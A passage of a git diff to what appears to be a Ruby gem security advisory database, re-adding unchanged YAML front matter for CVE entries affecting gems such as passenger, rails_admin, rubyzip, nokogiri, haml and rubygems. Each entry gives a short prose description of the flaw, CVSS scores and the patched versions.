+    - https://github.com/advisories/GHSA-jvgm-pfqv-887x
+    - https://seclists.org/oss-sec/2016/q4/25
+    - https://seclists.org/oss-sec/2016/q4/18
+    - https://seclists.org/oss-sec/2016/q4/20
+    - https://github.com/rubygems/bundler/pull/3696
+    - https://github.com/rubygems/bundler/issues/3671
+    - https://github.com/rubygems/bundler/issues/5274
+    - https://github.com/rubygems/bundler/issues/5051
+    - https://github.com/rubygems/bundler/issues/5062
+  notes: 'NOTE: This might overlap CVE-2013-0334.; GHSA is unreviewed'
+---
diff --git a/advisories/_posts/2016-11-09-CVE-2016-10345.md b/advisories/_posts/2016-11-09-CVE-2016-10345.md
index c98024d9..49272984 100644
--- a/advisories/_posts/2016-11-09-CVE-2016-10345.md
+++ b/advisories/_posts/2016-11-09-CVE-2016-10345.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2016-10345 (passenger): Predictable tmp File Path Vulnerability in Phusion
-  Passenger'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2016-10345
-  ghsa: cqxw-3p7v-p9gr
-  url: https://blog.phusion.nl/2017/01/10/passenger-5-1-1/
-  title: Predictable tmp File Path Vulnerability in Phusion Passenger
-  date: 2016-11-09
-  description: |
-    In Phusion Passenger before 5.1.0, a known /tmp filename was used during
-    passenger-install-nginx-module execution, which could allow local attackers to gain
-    the privileges of the passenger user.
-  cvss_v2: 4.6
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 5.1.0"
----
+---
+layout: advisory
+title: 'CVE-2016-10345 (passenger): Predictable tmp File Path Vulnerability in Phusion
+  Passenger'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2016-10345
+  ghsa: cqxw-3p7v-p9gr
+  url: https://blog.phusion.nl/2017/01/10/passenger-5-1-1/
+  title: Predictable tmp File Path Vulnerability in Phusion Passenger
+  date: 2016-11-09
+  description: |
+    In Phusion Passenger before 5.1.0, a known /tmp filename was used during
+    passenger-install-nginx-module execution, which could allow local attackers to gain
+    the privileges of the passenger user.
+  cvss_v2: 4.6
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 5.1.0"
+---
diff --git a/advisories/_posts/2016-12-21-CVE-2016-10522.md b/advisories/_posts/2016-12-21-CVE-2016-10522.md
index 09905dc7..153c2ef9 100644
--- a/advisories/_posts/2016-12-21-CVE-2016-10522.md
+++ b/advisories/_posts/2016-12-21-CVE-2016-10522.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2016-10522 (rails_admin): CSRF vulnerability in rails_admin'
-comments: false
-categories:
-- rails_admin
-advisory:
-  gem: rails_admin
-  cve: 2016-10522
-  ghsa: pxqr-8v54-m2hj
-  url: https://www.sourceclear.com/blog/Rails_admin-Vulnerability-Disclosure/
-  title: CSRF vulnerability in rails_admin
-  date: 2016-12-21
-  description: |
-    The rails_admin gem is vulnerable to cross-site request forgery (CSRF) attacks.
-    Due to a bug, non-GET methods were not validating CSRF tokens and, as a result,
-    an attacker could hypothetically gain access to the application administrative
-    endpoints exposed by the gem.
-  cvss_v2: 5.5
-  cvss_v3: 8.8
-  unaffected_versions:
-  - "< 1.0.0"
-  patched_versions:
-  - ">= 1.1.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-10522
-    - https://www.sourceclear.com/registry/security/cross-site-request-forgery-csrf-/ruby/sid-3173
-    - https://github.com/sferik/rails_admin/commit/b13e879eb93b661204e9fb5e55f7afa4f397537a
-    - https://advisories.gitlab.com/pkg/gem/rails_admin/SRCCLR-SID-3173
-    - https://github.com/advisories/GHSA-pxqr-8v54-m2hj
----
+---
+layout: advisory
+title: 'CVE-2016-10522 (rails_admin): CSRF vulnerability in rails_admin'
+comments: false
+categories:
+- rails_admin
+advisory:
+  gem: rails_admin
+  cve: 2016-10522
+  ghsa: pxqr-8v54-m2hj
+  url: https://www.sourceclear.com/blog/Rails_admin-Vulnerability-Disclosure/
+  title: CSRF vulnerability in rails_admin
+  date: 2016-12-21
+  description: |
+    The rails_admin gem is vulnerable to cross-site request forgery (CSRF) attacks.
+    Due to a bug, non-GET methods were not validating CSRF tokens and, as a result,
+    an attacker could hypothetically gain access to the application administrative
+    endpoints exposed by the gem.
+  cvss_v2: 5.5
+  cvss_v3: 8.8
+  unaffected_versions:
+  - "< 1.0.0"
+  patched_versions:
+  - ">= 1.1.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10522
+    - https://www.sourceclear.com/registry/security/cross-site-request-forgery-csrf-/ruby/sid-3173
+    - https://github.com/sferik/rails_admin/commit/b13e879eb93b661204e9fb5e55f7afa4f397537a
+    - https://advisories.gitlab.com/pkg/gem/rails_admin/SRCCLR-SID-3173
+    - https://github.com/advisories/GHSA-pxqr-8v54-m2hj
+---
diff --git a/advisories/_posts/2017-01-11-CVE-2017-18076.md b/advisories/_posts/2017-01-11-CVE-2017-18076.md
index ac1e64a5..b88d73fc 100644
--- a/advisories/_posts/2017-01-11-CVE-2017-18076.md
+++ b/advisories/_posts/2017-01-11-CVE-2017-18076.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-18076 (omniauth): omniauth leaks authenticity token in callback params'
-comments: false
-categories:
-- omniauth
-advisory:
-  gem: omniauth
-  cve: 2017-18076
-  ghsa: 9pr6-grf4-x2fr
-  url: https://github.com/omniauth/omniauth/pull/867
-  title: omniauth leaks authenticity token in callback params
-  date: 2017-01-11
-  description: |
-    In strategy.rb in OmniAuth before 1.3.2, the authenticity_token value
-    is improperly protected because POST (in addition to GET) parameters are stored
-    in the session and become available in the environment of the callback phase.
-  cvss_v2: 6.8
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.3.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-18076
----
+---
+layout: advisory
+title: 'CVE-2017-18076 (omniauth): omniauth leaks authenticity token in callback params'
+comments: false
+categories:
+- omniauth
+advisory:
+  gem: omniauth
+  cve: 2017-18076
+  ghsa: 9pr6-grf4-x2fr
+  url: https://github.com/omniauth/omniauth/pull/867
+  title: omniauth leaks authenticity token in callback params
+  date: 2017-01-11
+  description: |
+    In strategy.rb in OmniAuth before 1.3.2, the authenticity_token value
+    is improperly protected because POST (in addition to GET) parameters are stored
+    in the session and become available in the environment of the callback phase.
+  cvss_v2: 6.8
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.3.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18076
+---
diff --git a/advisories/_posts/2017-02-27-CVE-2017-5946.md b/advisories/_posts/2017-02-27-CVE-2017-5946.md
index db6c5451..1951b8b2 100644
--- a/advisories/_posts/2017-02-27-CVE-2017-5946.md
+++ b/advisories/_posts/2017-02-27-CVE-2017-5946.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2017-5946 (rubyzip): Directory traversal vulnerability in rubyzip'
-comments: false
-categories:
-- rubyzip
-advisory:
-  gem: rubyzip
-  cve: 2017-5946
-  ghsa: gcqq-w6gr-h9j9
-  url: https://github.com/rubyzip/rubyzip/issues/315
-  title: Directory traversal vulnerability in rubyzip
-  date: 2017-02-27
-  description: |
-    The Zip::File component in the rubyzip gem before 1.2.1 for Ruby has a
-    directory traversal vulnerability. If a site allows uploading of .zip files,
-    an attacker can upload a malicious file that uses "../" pathname substrings to
-    write arbitrary files to the filesystem.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.2.1"
----
+---
+layout: advisory
+title: 'CVE-2017-5946 (rubyzip): Directory traversal vulnerability in rubyzip'
+comments: false
+categories:
+- rubyzip
+advisory:
+  gem: rubyzip
+  cve: 2017-5946
+  ghsa: gcqq-w6gr-h9j9
+  url: https://github.com/rubyzip/rubyzip/issues/315
+  title: Directory traversal vulnerability in rubyzip
+  date: 2017-02-27
+  description: |
+    The Zip::File component in the rubyzip gem before 1.2.1 for Ruby has a
+    directory traversal vulnerability. If a site allows uploading of .zip files,
+    an attacker can upload a malicious file that uses "../" pathname substrings to
+    write arbitrary files to the filesystem.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.2.1"
+---
diff --git a/advisories/_posts/2017-03-11-CVE-2016-4658.md b/advisories/_posts/2017-03-11-CVE-2016-4658.md
index 9166ac2e..034d7be2 100644
--- a/advisories/_posts/2017-03-11-CVE-2016-4658.md
+++ b/advisories/_posts/2017-03-11-CVE-2016-4658.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2016-4658 (nokogiri): Nokogiri gem contains several vulnerabilities in
-  libxml2 and libxslt'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2016-4658
-  ghsa: fr52-4hqw-p27f
-  url: https://github.com/sparklemotion/nokogiri/issues/1615
-  title: Nokogiri gem contains several vulnerabilities in libxml2 and libxslt
-  date: 2017-03-11
-  description: |
-    Nokogiri version 1.7.1 has been released, pulling in several upstream
-    patches to the vendored libxml2 to address the following CVEs:
-
-    CVE-2016-4658
-    CVSS v3 Base Score: 9.8 (Critical)
-    libxml2 in Apple iOS before 10, OS X before 10.12, tvOS before 10, and
-    watchOS before 3 allows remote attackers to execute arbitrary code or cause
-    a denial of service (memory corruption) via a crafted XML document.
-
-    CVE-2016-5131
-    CVSS v3 Base Score: 8.8 (HIGH)
-    Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google
-    Chrome before 52.0.2743.82, allows remote attackers to cause a denial of
-    service or possibly have unspecified other impact via vectors related to
-    the XPointer range-to function.
-  cvss_v2: 10.0
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.7.1"
-  related:
-    cve:
-    - 2016-5131
-    url:
-    - https://github.com/sparklemotion/nokogiri/issues/1615
----
+---
+layout: advisory
+title: 'CVE-2016-4658 (nokogiri): Nokogiri gem contains several vulnerabilities in
+  libxml2 and libxslt'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2016-4658
+  ghsa: fr52-4hqw-p27f
+  url: https://github.com/sparklemotion/nokogiri/issues/1615
+  title: Nokogiri gem contains several vulnerabilities in libxml2 and libxslt
+  date: 2017-03-11
+  description: |
+    Nokogiri version 1.7.1 has been released, pulling in several upstream
+    patches to the vendored libxml2 to address the following CVEs:
+
+    CVE-2016-4658
+    CVSS v3 Base Score: 9.8 (Critical)
+    libxml2 in Apple iOS before 10, OS X before 10.12, tvOS before 10, and
+    watchOS before 3 allows remote attackers to execute arbitrary code or cause
+    a denial of service (memory corruption) via a crafted XML document.
+
+    CVE-2016-5131
+    CVSS v3 Base Score: 8.8 (HIGH)
+    Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google
+    Chrome before 52.0.2743.82, allows remote attackers to cause a denial of
+    service or possibly have unspecified other impact via vectors related to
+    the XPointer range-to function.
+  cvss_v2: 10.0
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.7.1"
+  related:
+    cve:
+    - 2016-5131
+    url:
+    - https://github.com/sparklemotion/nokogiri/issues/1615
+---
diff --git a/advisories/_posts/2017-04-05-CVE-2017-7540.md b/advisories/_posts/2017-04-05-CVE-2017-7540.md
index c2c82602..c6f52d5c 100644
--- a/advisories/_posts/2017-04-05-CVE-2017-7540.md
+++ b/advisories/_posts/2017-04-05-CVE-2017-7540.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2017-7540 (safemode): Safemode Gem for Ruby is vulnerable to bypassing
-  safe mode limitations'
-comments: false
-categories:
-- safemode
-advisory:
-  gem: safemode
-  cve: 2017-7540
-  ghsa: 5vx5-9q73-wgp4
-  url: https://nvd.nist.gov/vuln/detail/CVE-2017-7540
-  title: Safemode Gem for Ruby is vulnerable to bypassing safe mode limitations
-  date: 2017-04-05
-  description: |
-    Safemode, as used in Foreman, versions 1.3.2 and earlier are vulnerable
-    to bypassing safe mode limitations via special Ruby syntax. This can
-    lead to deletion of objects for which the user does not have delete
-    permissions or possibly to privilege escalation.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.3.3"
-  related:
-    url:
-    - https://github.com/svenfuchs/safemode/pull/23
----
+---
+layout: advisory
+title: 'CVE-2017-7540 (safemode): Safemode Gem for Ruby is vulnerable to bypassing
+  safe mode limitations'
+comments: false
+categories:
+- safemode
+advisory:
+  gem: safemode
+  cve: 2017-7540
+  ghsa: 5vx5-9q73-wgp4
+  url: https://nvd.nist.gov/vuln/detail/CVE-2017-7540
+  title: Safemode Gem for Ruby is vulnerable to bypassing safe mode limitations
+  date: 2017-04-05
+  description: |
+    Safemode, as used in Foreman, versions 1.3.2 and earlier are vulnerable
+    to bypassing safe mode limitations via special Ruby syntax. This can
+    lead to deletion of objects for which the user does not have delete
+    permissions or possibly to privilege escalation.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.3.3"
+  related:
+    url:
+    - https://github.com/svenfuchs/safemode/pull/23
+---
diff --git a/advisories/_posts/2017-05-01-CVE-2017-8418.md b/advisories/_posts/2017-05-01-CVE-2017-8418.md
index 0b8ba913..b0282fab 100644
--- a/advisories/_posts/2017-05-01-CVE-2017-8418.md
+++ b/advisories/_posts/2017-05-01-CVE-2017-8418.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2017-8418 (rubocop): RuboCop gem Insecure use of /tmp'
-comments: false
-categories:
-- rubocop
-advisory:
-  gem: rubocop
-  cve: 2017-8418
-  ghsa: wmjf-jpjj-9f3j
-  url: https://github.com/bbatsov/rubocop/issues/4336
-  title: RuboCop gem Insecure use of /tmp
-  date: 2017-05-01
-  description: |
-    RuboCop 0.48.1 and earlier does not use /tmp in safe way, allowing local
-    users to exploit this to tamper with cache files belonging to other users.
-  cvss_v2: 2.1
-  cvss_v3: 3.3
-  patched_versions:
-  - ">= 0.49.0"
-  related:
-    url:
-    - http://www.openwall.com/lists/oss-security/2017/05/01/14
----
+---
+layout: advisory
+title: 'CVE-2017-8418 (rubocop): RuboCop gem Insecure use of /tmp'
+comments: false
+categories:
+- rubocop
+advisory:
+  gem: rubocop
+  cve: 2017-8418
+  ghsa: wmjf-jpjj-9f3j
+  url: https://github.com/bbatsov/rubocop/issues/4336
+  title: RuboCop gem Insecure use of /tmp
+  date: 2017-05-01
+  description: |
+    RuboCop 0.48.1 and earlier does not use /tmp in safe way, allowing local
+    users to exploit this to tamper with cache files belonging to other users.
+  cvss_v2: 2.1
+  cvss_v3: 3.3
+  patched_versions:
+  - ">= 0.49.0"
+  related:
+    url:
+    - http://www.openwall.com/lists/oss-security/2017/05/01/14
+---
diff --git a/advisories/_posts/2017-05-08-CVE-2017-1002201.md b/advisories/_posts/2017-05-08-CVE-2017-1002201.md
index 0259694b..b1251687 100644
--- a/advisories/_posts/2017-05-08-CVE-2017-1002201.md
+++ b/advisories/_posts/2017-05-08-CVE-2017-1002201.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2017-1002201 (haml): haml failure to escape single quotes'
-comments: false
-categories:
-- haml
-advisory:
-  gem: haml
-  cve: 2017-1002201
-  ghsa: r53w-g4xm-3gc6
-  url: https://github.com/haml/haml/commit/18576ae6e9bdcb4303fdbe6b3199869d289d67c2
-  title: haml failure to escape single quotes
-  date: 2017-05-08
-  description: |
-    In haml versions prior to version 5.0.0.beta.2, when using user input to
-    perform tasks on the server, characters like < > " ' must be escaped properly.
-    In this case, the ' character was missed. An attacker can manipulate the input
-    to introduce additional attributes, potentially executing code.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 5.0.0.beta.2"
-  related:
-    url:
-    - https://snyk.io/vuln/SNYK-RUBY-HAML-20362
----
+---
+layout: advisory
+title: 'CVE-2017-1002201 (haml): haml failure to escape single quotes'
+comments: false
+categories:
+- haml
+advisory:
+  gem: haml
+  cve: 2017-1002201
+  ghsa: r53w-g4xm-3gc6
+  url: https://github.com/haml/haml/commit/18576ae6e9bdcb4303fdbe6b3199869d289d67c2
+  title: haml failure to escape single quotes
+  date: 2017-05-08
+  description: |
+    In haml versions prior to version 5.0.0.beta.2, when using user input to
+    perform tasks on the server, characters like < > " ' must be escaped properly.
+    In this case, the ' character was missed. An attacker can manipulate the input
+    to introduce additional attributes, potentially executing code.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 5.0.0.beta.2"
+  related:
+    url:
+    - https://snyk.io/vuln/SNYK-RUBY-HAML-20362
+---
diff --git a/advisories/_posts/2017-05-09-CVE-2017-5029.md b/advisories/_posts/2017-05-09-CVE-2017-5029.md
index 4436c5c1..c5a0fba3 100644
--- a/advisories/_posts/2017-05-09-CVE-2017-5029.md
+++ b/advisories/_posts/2017-05-09-CVE-2017-5029.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2017-5029 (nokogiri): Nokogiri gem contains two upstream vulnerabilities
-  in libxslt 1.1.29'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2017-5029
-  ghsa: pf6m-fxpq-fg8v
-  url: https://github.com/sparklemotion/nokogiri/issues/1634
-  title: Nokogiri gem contains two upstream vulnerabilities in libxslt 1.1.29
-  date: 2017-05-09
-  description: |
-    nokogiri version 1.7.2 has been released.
-
-    This is a security update based on 1.7.1, addressing two upstream
-    libxslt 1.1.29 vulnerabilities classified as "Medium" by Canonical
-    and given a CVSS3 score of "6.5 Medium" and "8.8 High" by RedHat.
-
-    These patches only apply when using Nokogiri's vendored libxslt
-    package. If you're using your distro's system libraries, there's no
-    need to upgrade from 1.7.0.1 or 1.7.1 at this time.
-
-    Full details are available at the github issue linked to in the
-    changelog below.
-
-    -----
-
-    # 1.7.2 / 2017-05-09
-
-    ## Security Notes
-
-    [MRI] Upstream libxslt patches are applied to the vendored libxslt
-    1.1.29 which address CVE-2017-5029 and CVE-2016-4738.
-
-    For more information:
-
-    * https://github.com/sparklemotion/nokogiri/issues/1634
-    * http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5029.html
-    * http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4738.html
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.7.2"
-  related:
-    cve:
-    - 2016-4738
-    - 2017-5029
-    url:
-    - http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5029.html
-    - http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4738.html
----
+---
+layout: advisory
+title: 'CVE-2017-5029 (nokogiri): Nokogiri gem contains two upstream vulnerabilities
+  in libxslt 1.1.29'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2017-5029
+  ghsa: pf6m-fxpq-fg8v
+  url: https://github.com/sparklemotion/nokogiri/issues/1634
+  title: Nokogiri gem contains two upstream vulnerabilities in libxslt 1.1.29
+  date: 2017-05-09
+  description: |
+    nokogiri version 1.7.2 has been released.
+
+    This is a security update based on 1.7.1, addressing two upstream
+    libxslt 1.1.29 vulnerabilities classified as "Medium" by Canonical
+    and given a CVSS3 score of "6.5 Medium" and "8.8 High" by RedHat.
+
+    These patches only apply when using Nokogiri's vendored libxslt
+    package. If you're using your distro's system libraries, there's no
+    need to upgrade from 1.7.0.1 or 1.7.1 at this time.
+
+    Full details are available at the github issue linked to in the
+    changelog below.
+
+    -----
+
+    # 1.7.2 / 2017-05-09
+
+    ## Security Notes
+
+    [MRI] Upstream libxslt patches are applied to the vendored libxslt
+    1.1.29 which address CVE-2017-5029 and CVE-2016-4738.
+
+    For more information:
+
+    * https://github.com/sparklemotion/nokogiri/issues/1634
+    * http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5029.html
+    * http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4738.html
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.7.2"
+  related:
+    cve:
+    - 2016-4738
+    - 2017-5029
+    url:
+    - http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5029.html
+    - http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4738.html
+---
diff --git a/advisories/_posts/2017-06-16-CVE-2016-1000221.md b/advisories/_posts/2017-06-16-CVE-2016-1000221.md
index a010caa6..4ad4f70e 100644
--- a/advisories/_posts/2017-06-16-CVE-2016-1000221.md
+++ b/advisories/_posts/2017-06-16-CVE-2016-1000221.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2016-1000221 (logstash-core): Logstash Logs Sensitive Information'
-comments: false
-categories:
-- logstash-core
-advisory:
-  gem: logstash-core
-  cve: 2016-1000221
-  ghsa: vcmm-ppqx-95ch
-  url: https://web.archive.org/web/20210124065200/http://www.securityfocus.com/bid/99126
-  title: Logstash Logs Sensitive Information
-  date: 2017-06-16
-  description: |
-    Logstash prior to version 2.3.4, Elasticsearch Output plugin would log
-    to file HTTP authorization headers which could contain sensitive information.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.3.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000221
-    - https://web.archive.org/web/20210124065200/http://www.securityfocus.com/bid/99126
-    - https://security-tracker.debian.org/tracker/CVE-2016-1000221
-    - http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.108361
-    - https://www.scaprepo.com/control.jsp?command=relation&relationId=CVE-2016-1000221&search=CVE-2016-1000221
-    - https://cve.reconshell.com/cve/CVE-2016-1000221
-    - https://www.elastic.co/community/security
-    - https://github.com/advisories/GHSA-vcmm-ppqx-95ch
----
+---
+layout: advisory
+title: 'CVE-2016-1000221 (logstash-core): Logstash Logs Sensitive Information'
+comments: false
+categories:
+- logstash-core
+advisory:
+  gem: logstash-core
+  cve: 2016-1000221
+  ghsa: vcmm-ppqx-95ch
+  url: https://web.archive.org/web/20210124065200/http://www.securityfocus.com/bid/99126
+  title: Logstash Logs Sensitive Information
+  date: 2017-06-16
+  description: |
+    Logstash prior to version 2.3.4, Elasticsearch Output plugin would log
+    to file HTTP authorization headers which could contain sensitive information.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.3.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000221
+    - https://web.archive.org/web/20210124065200/http://www.securityfocus.com/bid/99126
+    - https://security-tracker.debian.org/tracker/CVE-2016-1000221
+    - http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.108361
+    - https://www.scaprepo.com/control.jsp?command=relation&relationId=CVE-2016-1000221&search=CVE-2016-1000221
+    - https://cve.reconshell.com/cve/CVE-2016-1000221
+    - https://www.elastic.co/community/security
+    - https://github.com/advisories/GHSA-vcmm-ppqx-95ch
+---
diff --git a/advisories/_posts/2017-07-11-CVE-2017-16833.md b/advisories/_posts/2017-07-11-CVE-2017-16833.md
index c262b58a..b291784f 100644
--- a/advisories/_posts/2017-07-11-CVE-2017-16833.md
+++ b/advisories/_posts/2017-07-11-CVE-2017-16833.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2017-16833 (gemirro): Stored XSS in "gemirro" via injection in Gemspec
-  "homepage" value'
-comments: false
-categories:
-- gemirro
-advisory:
-  gem: gemirro
-  cve: 2017-16833
-  ghsa: x7p2-x2j6-mwhr
-  url: https://github.com/PierreRambaud/gemirro/commit/9659f9b7ce15a723da8e361bd41b9203b19c97de
-  title: Stored XSS in "gemirro" via injection in Gemspec "homepage" value
-  date: 2017-07-11
-  description: |
-    Stored cross-site scripting (XSS) vulnerability in Gemirro allows
-    attackers to inject arbitrary web script via a crafted JavaScript URL
-    in the "homepage" value of a ".gemspec" file.
-
-    A ".gemspec" file must be created with a JavaScript URL in the homepage
-    value. This can be used to build a gem for upload to the Gemirro server,
-    in order to achieve stored XSS via the author name hyperlink.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.15.0"
-  related:
-    url:
-    - https://github.com/PierreRambaud/gemirro/commit/8acfb9ce9774128d535e2795d583242bb86d6ea8
-    - https://github.com/PierreRambaud/gemirro/commit/8fa709b121b7e18fceda308917d0fb68dc1479c3
-    - https://rubygems.org/gems/gemirro/versions/0.15.0
----
+---
+layout: advisory
+title: 'CVE-2017-16833 (gemirro): Stored XSS in "gemirro" via injection in Gemspec
+  "homepage" value'
+comments: false
+categories:
+- gemirro
+advisory:
+  gem: gemirro
+  cve: 2017-16833
+  ghsa: x7p2-x2j6-mwhr
+  url: https://github.com/PierreRambaud/gemirro/commit/9659f9b7ce15a723da8e361bd41b9203b19c97de
+  title: Stored XSS in "gemirro" via injection in Gemspec "homepage" value
+  date: 2017-07-11
+  description: |
+    Stored cross-site scripting (XSS) vulnerability in Gemirro allows
+    attackers to inject arbitrary web script via a crafted JavaScript URL
+    in the "homepage" value of a ".gemspec" file.
+
+    A ".gemspec" file must be created with a JavaScript URL in the homepage
+    value. This can be used to build a gem for upload to the Gemirro server,
+    in order to achieve stored XSS via the author name hyperlink.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.15.0"
+  related:
+    url:
+    - https://github.com/PierreRambaud/gemirro/commit/8acfb9ce9774128d535e2795d583242bb86d6ea8
+    - https://github.com/PierreRambaud/gemirro/commit/8fa709b121b7e18fceda308917d0fb68dc1479c3
+    - https://rubygems.org/gems/gemirro/versions/0.15.0
+---
diff --git a/advisories/_posts/2017-08-29-CVE-2017-0899.md b/advisories/_posts/2017-08-29-CVE-2017-0899.md
index 75fe062f..33bcbcf3 100644
--- a/advisories/_posts/2017-08-29-CVE-2017-0899.md
+++ b/advisories/_posts/2017-08-29-CVE-2017-0899.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2017-0899 (rubygems-update): RubyGems ANSI escape sequence vulnerability'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2017-0899
-  ghsa: 7gcp-2gmq-w3xh
-  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
-  title: RubyGems ANSI escape sequence vulnerability
-  date: 2017-08-29
-  description: |
-    RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem
-    specifications that include terminal escape characters. Printing the gem
-    specification would execute terminal escape sequences.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.4.5.3"
-  - ">= 2.5.2.1"
-  - ">= 2.6.13"
----
+---
+layout: advisory
+title: 'CVE-2017-0899 (rubygems-update): RubyGems ANSI escape sequence vulnerability'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2017-0899
+  ghsa: 7gcp-2gmq-w3xh
+  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
+  title: RubyGems ANSI escape sequence vulnerability
+  date: 2017-08-29
+  description: |
+    RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem
+    specifications that include terminal escape characters. Printing the gem
+    specification would execute terminal escape sequences.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.4.5.3"
+  - ">= 2.5.2.1"
+  - ">= 2.6.13"
+---
diff --git a/advisories/_posts/2017-08-29-CVE-2017-0900.md b/advisories/_posts/2017-08-29-CVE-2017-0900.md
index 49d93b13..4075f345 100644
--- a/advisories/_posts/2017-08-29-CVE-2017-0900.md
+++ b/advisories/_posts/2017-08-29-CVE-2017-0900.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2017-0900 (rubygems-update): RubyGems DoS vulnerability in the query command'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2017-0900
-  ghsa: p7f2-rr42-m9xm
-  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
-  title: RubyGems DoS vulnerability in the query command
-  date: 2017-08-29
-  description: |
-    RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem
-    specifications to cause a denial of service attack against RubyGems clients
-    who have issued a `query` command.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.4.5.3"
-  - ">= 2.5.2.1"
-  - ">= 2.6.13"
----
+---
+layout: advisory
+title: 'CVE-2017-0900 (rubygems-update): RubyGems DoS vulnerability in the query command'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2017-0900
+  ghsa: p7f2-rr42-m9xm
+  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
+  title: RubyGems DoS vulnerability in the query command
+  date: 2017-08-29
+  description: |
+    RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem
+    specifications to cause a denial of service attack against RubyGems clients
+    who have issued a `query` command.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.4.5.3"
+  - ">= 2.5.2.1"
+  - ">= 2.6.13"
+---
diff --git a/advisories/_posts/2017-08-29-CVE-2017-0901.md b/advisories/_posts/2017-08-29-CVE-2017-0901.md
index 50b661bf..0a75566a 100644
--- a/advisories/_posts/2017-08-29-CVE-2017-0901.md
+++ b/advisories/_posts/2017-08-29-CVE-2017-0901.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2017-0901 (rubygems-update): RubyGems vulnerability in the gem installer
-  that allowed a malicious gem to overwrite arbitrary files'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2017-0901
-  ghsa: pm9x-4392-2c2p
-  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
